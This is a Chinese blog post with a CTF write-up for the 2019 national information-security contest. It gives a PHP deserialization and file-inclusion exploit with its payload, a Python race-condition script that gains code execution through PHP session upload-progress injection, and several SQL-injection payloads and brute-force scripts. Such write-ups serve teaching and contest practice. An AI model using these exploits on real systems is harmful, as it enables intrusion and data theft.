2019全国信息安全大赛

最新推荐文章于 2023-05-27 21:41:01 发布
最新推荐文章于 2023-05-27 21:41:01 发布
阅读量1k 收藏 3
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41107295/article/details/111881269
版权

time: 2019-04-27 11:36

web1

image.png

查看源码
图片.png

然后文件包含,读取hint.php
获取到的源码:

http://b61818746d3d4bd9840914f5b107e98298d37d27278746d1.changame.ichunqiu.com/index.php?file=php://filter/read=convert.base64-encode/resource=hint.php

经过base64解码,得到hint.php源码:
hint.php

<?php  
class Handle{ 
    private $handle;  
    public function __wakeup(){
foreach(get_object_vars($this) as $k => $v) {
            $this->$k = null;
        }
        echo "Waking up\n";
    }
public function __construct($handle) { 
        $this->handle = $handle; 
    } 
public function __destruct(){
$this->handle->getFlag();
}
}

class Flag{
    public $file;
    public $token;
    public $token_flag;

    function __construct($file){
$this->file = $file;
$this->token_flag = $this->token = md5(rand(1,10000));
    }

public function getFlag(){
$this->token_flag = md5(rand(1,10000));
        if($this->token === $this->token_flag)
{
if(isset($this->file)){
echo @highlight_file($this->file,true); 
            }  
        }
    }
}
?>

index.php


<html>
<?php
error_reporting(0); 
$file = $_GET["file"]; 
$payload = $_GET["payload"];
if(!isset($file)){
echo 'Missing parameter'.'<br>';
}
if(preg_match("/flag/",$file)){
die('hack attacked!!!');
}
@include($file);
if(isset($payload)){  
    $url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'],$query);
    foreach($query as $value){
        if (preg_match("/flag/",$value)) { 
         die('stop hacking!');
         exit();
        }
    }
    $payload = unserialize($payload);
}else{ 
   echo "Missing parameters"; 
} 
?>
<!--Please test index.php?file=xxx.php -->
<!--Please get the source of hint.php-->

</html>

通过GET获取两个参数:file和payload。
Hint.php中有两个类Flag和Handle。主要是通过Handle来调用Flag的getFlag()函数。但在Handle中存在wakeup()函数,该函数会重置所有变量,导致传入的Flag类对象为空。这里可以利用增加对象个数的方式来绕过wakeup函数。
除此之外,在getFlag()函数前面,会重新给token_flag赋值,将会导致token和token_flag的值不同,因而无法拿到flag。这里需要使用取地址符号&,让

$token=&$token_flag

即可。但最后在index.php中还有一个判断是否存在flag字符,如果存在,页面将会终止。但输入多个斜杠即可绕过- -。///

PHP生成的POC如下:

<?php  
class Handle{ 
    private $handle;  
    public function __wakeup(){
		foreach(get_object_vars($this) as $k => $v) {
            $this->$k = null;
        }
        echo "Waking up\n";
    }
	public function __construct($handle) { 
        $this->handle = $handle; 
    } 
	public function __destruct(){
		$this->handle->getFlag();
	}
}

class Flag{
    public $file;
    public $token;
    public $token_flag;
 
    function __construct($file){
        $this->file = $file;
        $this->token = &$this->token_flag;

    }
    public function getFlag(){
        
        $this->token_flag = md5(rand(1,10000));

        if($this->token === $this->token_flag)
        {

            if(isset($this->file)){
                echo @highlight_file($this->file,true); 
            }  
        }
    }
}


$o=new Flag("flag.php");

$oo=new Handle($o);
$ser=serialize($oo);

print $ser;
?>

注意 Handle 里的 handle 是私有成员变量,所以得特殊处理下,里面的方块那记得换成 %00。
将生成的payload中的变量个数1改成2,然后增加几个//放到url后面即可绕过- -。

最后的payload。

///index.php?file=hint.php&payload=O:6:"Handle":2:{s:14:"%00Handle%00handle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";N;s:10:"token_flag";R:4;}}

图片.png

解法二

包含session文件以RCE
这道题默认没有session,我们可以通过伪造固定session,post一个空文件以及恶意的PHP_SESSION_UPLOAD_PROGRES来执行构造的任意代码。 PHP_SESSION_UPLOAD_PROGRES是一个常量,他是php.ini设置中session.upload_progress.name的默认值,session.upload_progress是PHP5.4的新特征。下面是我本地php5.4的默认配置:
image

讲一下个别配置的含义:

  • session.upload_progress.cleanup 是否在上传结束清除上传进度信息,默认为on
  • session.upload_progress.enabled 是否开启记录上传进度信息,默认为on
  • session.uploadprogress.prefix 存储上传进度信息的变量前缀,默认为upload_progress
  • session.upload_progress.name POST中代表进度信息的常量名称,默认为PHP_SESSION_UPLOAD_PROGRES如果
  • _POST[session.upload_progress.name]没有被设置, 则不会报告进度

可以看到,session.upload_progress.cleanup默认是开启的,这意味着我们上传文件后,进度信息会被删除,我们也就不能直接包含session文件,这就需要利用条件竞争,趁进度信息还未被删除时包含session文件。

条件竞争 一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计不合理时,将会导致一系列问题的发生。

我们写一个脚本,一个线程不断上传空文件(同时post伪造的恶意进度信息),另一些线程不停地访问session临时文件,总有几次我们会在服务端还没有删除进度信息时访问到session临时文件。

python脚本:

import requests
import threading

url='http://127.0.0.1/index.php'
r=requests.session()
headers={
    "Cookie":'PHPSESSID=123'
}
def POST():
    while True:
        file={
            "upload":('','')                                                    #上传无效的空文件
        }
        data={
            "PHP_SESSION_UPLOAD_PROGRESS":'<?php readfile("./flag.php");?>'     #恶意进度信息,readfile将直接输出文件内容
        }
        r.post(url,files=file,headers=headers,data=data)

def READ():
    while True:
        event.wait()
        t=r.get("http://127.0.0.1/index.php?file=../tmp/tmp/sess_123")
        if 'flag' not in t.text:
            print('[+]retry')
        else:
            print(t.text)
            event.clear()
event=threading.Event()
event.set()
threading.Thread(target=POST,args=()).start()
threading.Thread(target=READ,args=()).start()
threading.Thread(target=READ,args=()).start()
threading.Thread(target=READ,args=()).start()

RCE拿到flag内容:
image
因为比赛是下发的docker容器,写shell意义不大,但是的确通过这个脚本读到了flag。
这个方法依赖于php.ini的一些配置选项,以及session目录的信息,不过大多数情况下这些都是默认的。这是战队的一位很有才的新生想到的。

web2

image.png

报错配和盲注
发现or||被过滤,采用^配合AND进行注入。发现SLEEPBENCHMARK被过滤,使用正则DoS方式进行时间盲注。又由于不知道列名,因此再套一层,Payload如下:

admin'^(select+(select b from (select 1 as a,2 as b from user where 1=2 union select * from user) b) like'f1ag%'+and+concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'))+RLIKE+'(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bb')^'1'%3d'1#

后发现,还可以使用报错注入。如果报错,页面会提示“数据库操作错误”。基本Payload如下:

username='^(select exp(~((select (  (( select c.b from (select 1 as a,2 as b,3 as d from user union select * from user)c where a='admin' )) ))*18446744073709551615)))#&password=admin

很快注出密码是f1ag@1s-at_/fll1llag_h3r3,不过因为大小写不正确,要使用binary like。最终验证:

username='^(select exp(~((select( 2*length(( select c.b from (select 1 as a,2 as b from user union select * from user)c where a like binary 'admin' and b like binary 'F1AG@1s-at\_/fll1llag\_h3r3' ))=25))*18446744073709551615)))#&password=1

登录进去后伪造mysql服务,最近至少出现了三次,利用MySQL来手动读文件。https://github.com/allyshka/Rogue-MySql-Server/

smi1e师傅的

import string

url = 'http://39.106.224.151:52105/'

http://39.106.224.151:52105/'
st = '1234567890'+string.ascii_letters+string.punctuation
flag = ''

for i in range(29,50):
for s in st:
payload = "admin' and (select updatexml(0,unhex(((select substr(( select group_concat(`1`,`2`) from (select 1,2 union select * from user)a limit 1),{},1))='{}')^60),0))#".format(i,s)
#payload ="admin' and (select updatexml(0,unhex(((select substr((select '123456'),{},1))='{}')^60),0))#".format(i,s)

#print(payload)
data={
'username':'{}'.format(payload),
'password':'admin'
}

a = requests.post(url,data=data)
a.encoding="UTF-8"
#print(a.text)
if '登陆失败' in a.text:
flag += s
break
print(flag)

密码学

密码1

解题思路:将Part1,Part2,Part3,Part4,和a1,a2,a3,a4的积解出,并将其转化为16进制,填入flag的各个模块。

图片.png

解方程组,解出a1,a2,a3,a4,可以直接用网站工具进行解出a1,a2,a3,a4,并求其积的值。

图片.png

通过求两数之间的差值,发现每两个数之间都相差37个质数,由此可得part1=5399

[外链图片转存失败(img-mgDwx0Bt-1562586990727)(https://upload-images.jianshu.io/upload_images/9113981-53a2ab1eacb3f6ac.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]

进行求解,解出Part2,Part2=7700

图片.png

通过解题得Part3=18640

图片.png

Part4=40320

将Part1,Part2,Part3,Part4,a1a2a3*a4转换为16进制,填入flag中,即可得出flag.
最终结果为flag{01924dd7-1e14-48d0-9d80-fa6bed9c7a00}

其他大佬的wp

https://www.ctfwp.com/articals/2019national.html

https://www.zhaoj.in/read-5417.html

https://xz.aliyun.com/t/4906#toc-7

https://xz.aliyun.com/t/4904#toc-2

https://www.52pojie.cn/thread-936377-1-1.html

https://impakho.com/post/ciscn-2019-online-writeup

BerL1n
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第十届全国大学生信息安全竞赛-线上赛 write up(持续更新)
csu_vc的博客
09-17 2万+
0x00 WEBPHP execise -web150 这是一道分值150的web题,打开题目链接之后,看到题目界面 可以看到有一处输入的地方可以输入PHP语句 尝试执行以下phpinfo(),这里解释下,phpinfo是一个运行指令,目的为显示php服务器的配置信息。 phpinfo()输出 PHP 当前状态的大量信息,包含了 PHP 编译选项、启用的扩展、PHP 版本、服务器信息
2019工业信息安全技能大赛.rar
09-20
2019工业信息安全技能大赛,里面有多套题目,想学习工控的朋友不要错过,真的是学习的好资料
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN)
Welcome To Myon'Blog !
05-27 1809
第十六届全国大学生信息安全竞赛创新实践能力赛(CISCN) Misc 1、被加密的生产流量 Crypto 2、Sign_in_passwd Web 3、unzip 4、dumpit Re 5、babyRE Pwn 6、funcanary
2018年广东省电子设计竞赛一等奖作品报告及演示视频整理
09-09
2018年广东省大学生电子设计竞赛一等奖作品报告及演示视频,本资源仅供参考,切忌抄袭,希望对大家竞赛写作报告和制作演示视频有帮助
第十三届全国大学生信息安全竞赛(线上初赛)
A_dmin的博客
08-21 9919
第十三届全国大学生信息安全竞赛(线上初赛) WEB easyphp 打开题目拿到源码: 让进程异常退出,进入到phpinfo中 payload: http://eci-2ze4mvter6u3r4shc9j6.cloudeci1.ichunqiu.com/?a=call_user_func&b=pcntl_wait 运行得到phpinfo,找到flag即可: RCEME 貌似有原题,不过过滤的不一样,这道题没有过滤反撇号: <?php error_reporting(0); h
信息安全比赛平台相关收集(CTF比赛)
我的学习笔记
07-12 2409
学习教程与材料: 1、http://www.hackingarticles.in/ 一个外国人的CTF比赛记录博客; 在线实战平台: 1、https://www.hackthebox.eu/home 在线练习题很多,值得看一看,注册时候需要做题的,网上有帮助; 比赛用工具:...
2017年全国大学生信息安全竞赛---wanna to see your hat?
大方子
08-03 5321
====================================== 个人收获: 1.SQL注入语句中用/**/代替空格    (虽然之前就知道)         =========================================     题目界面:     常规的点击连接查看页面看到接下来几个页面   没有什么特别的发现,...
2019 全国信息安全竞赛初赛.zip
11-09
信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用...
竞赛资料源码-2019 全国信息安全竞赛初赛.zip
最新发布
01-25
大数据挑战赛、团体程序设计天梯赛、移动应用创新赛、网络技术挑战赛、全国大学生信息安全竞赛、“中国软件杯”大学生软件设计大赛全国大学生光电设计竞赛、中国机器人及人工智能大赛、“大唐杯”全国大学生移动...
2019 全国职业院校技能大赛-信息安全管理与评估解题思路与总结
09-18
2019 全国职业院校技能大赛-信息安全管理与评估解题思路与总结,包含了各个题目的解析以及手法,每个题目包含命令总结,以及思路讲解,循序规则,加深对神州数码设备的网络技术,有空时会继续开源 2021 2022 的赛题...
信息安全竞赛信息安全竞赛
06-26
信息安全竞赛信息安全竞赛信息安信息安全竞赛信息安全竞赛全竞赛信息安全信息安全竞赛赛
CTF网络安全大赛工具包集合
12-21
针对网络安全大赛的部分方向所需要的工具的集合
2019信息安全国赛部分题目文件
04-22
easyGo,bbvvmm,baby_pwn,double,where_u_are,Image.bin
全国大学生信息安全竞赛决赛作品.zip
11-09
信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用...
信息安全大赛之后的心得
qq_44813849的博客
06-23 2027
这是第一次参加信息安全大赛线下赛,之前都只是在网上做一些题目没有真正感受过比赛时的氛围。这一次的比赛让我感受到了别人的强大和自己的弱小。真的是不打一次比赛你都不知道自己有多菜。 ...
全国大学生信息安全竞赛真题(CTF)
热门推荐
Toufahaizai的博客
04-03 3万+
web篇: https://blog.csdn.net/csu_vc/article/details/78011716 https://www.cnblogs.com/iamstudy/articles/2017_quanguo_ctf_web_writeup.html https://blog.csdn.net/nzjdsds/article/details/81395642 https://b...
2021CTF工业信息安全技能大赛-智能卡
qq_43264813的博客
07-05 1354
2021CTF工业信息安全技能大赛-智能卡 小王是工厂的一名工程师,每天的工作是启动设备进行加工,设备一共进行两次加工。设备在运转过程中突然停止工作,打开梯形图发现其中两个数值丢失,请帮助小王填补数值VD200与VD300,flag为VD200加上VD300。flag格式为flag{VD200_XX_VD300_XX}。 使用工具:010Editor 解题步骤: 1.使用工具打开文件,进行md5校验和,得到md5值后小写提交flag。 2.FLAG flag{526e683b4f9ccf4aa56e65f
2019全国大学生信息安全竞赛初赛pwn前四题writeup—栈部分
weixin_33736649的博客
04-28 412
ret to libc技巧:https://blog.csdn.net/zh_explorer/article/details/80306965 如何leak出libc地址:基地址+函数在libc中的偏移地址=函数真实地址 1.已知libc,函数地址-函数在libc中的地址=基地址 2.不知道libc,就要leak出libc中的两个函数 转载于:https://www.cnblogs.com...
全国信息安全竞赛-easyGo writeup
SNAKEのBlog
04-23 1817
所需工具: ida pro,IDAGolangHelper,easyGo程序 将程序拖入对应位数的IDA中观察函数窗口,可以很容易的看出来,程序进行了无符号处理,Google翻阅资料,查看无符号golang逆向技巧,找到IDAGolangHelper这一脚本(项目地址在文章最下方) 接下来,我们打开脚本(文件-脚本文件)找到IDAGolangHelper脚本所在的文件,...
全国信息安全竞赛misc怎么做呢
06-09
信息安全竞赛misc(Miscellaneous)一般包括各种不同的题型,例如密码学、隐写、逆向工程、Web 安全、二进制漏洞分析等等。以下是一些常用的做题思路: 1. 了解基础知识:首先需要掌握一些基础的知识,例如编程语言...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

BerL1n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值